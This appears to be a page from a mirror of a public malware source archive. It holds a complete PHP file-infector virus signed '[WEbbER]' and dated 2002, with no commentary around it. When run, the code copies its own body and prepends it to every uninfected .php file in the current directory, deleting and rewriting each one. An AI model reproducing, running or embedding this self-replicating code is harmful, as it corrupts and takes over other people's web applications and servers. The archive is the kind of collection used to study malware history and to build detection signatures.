mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-30 06:55:27 +00:00
42 lines
868 B
Plaintext
42 lines
868 B
Plaintext
|
<?php
|
||
|
function webb()
|
||
|
{
|
||
|
//[WEbbER] by MI_pirat
|
||
|
//Copyright (C) 2002 [Red-Cell] inc.
|
||
|
$c = "";
|
||
|
//Get the virus from the host file
|
||
|
$f = fopen (__FILE__, "r");
|
||
|
$c = fread ($f, filesize (__FILE__));
|
||
|
fclose ($f);
|
||
|
$c = substr($c,0,866);
|
||
|
//Search for files to infect
|
||
|
$handle=opendir('.');
|
||
|
while (($file = readdir($handle))!==false) {
|
||
|
if ($file != "." && $file != "..")
|
||
|
{
|
||
|
$s = substr($file, -3);
|
||
|
//If not infected yet, infect it!
|
||
|
if ($s=="php")
|
||
|
{
|
||
|
$g = fopen ($file, "r");
|
||
|
$cont = fread ($g,filesize ($file));
|
||
|
fclose ($g);
|
||
|
if (!strstr($cont,"[WEbbER]")) //check the signature
|
||
|
{
|
||
|
unlink("$file"); //delete and prepend the virus
|
||
|
$g = fopen ($file, "a+");
|
||
|
fwrite ($g,"$c");
|
||
|
fwrite ($g,"\n");
|
||
|
fwrite ($g,substr($cont,5)); //append the original file
|
||
|
fclose ($g);
|
||
|
}
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
closedir($handle);
|
||
|
}
|
||
|
webb();
|
||
|
?>
|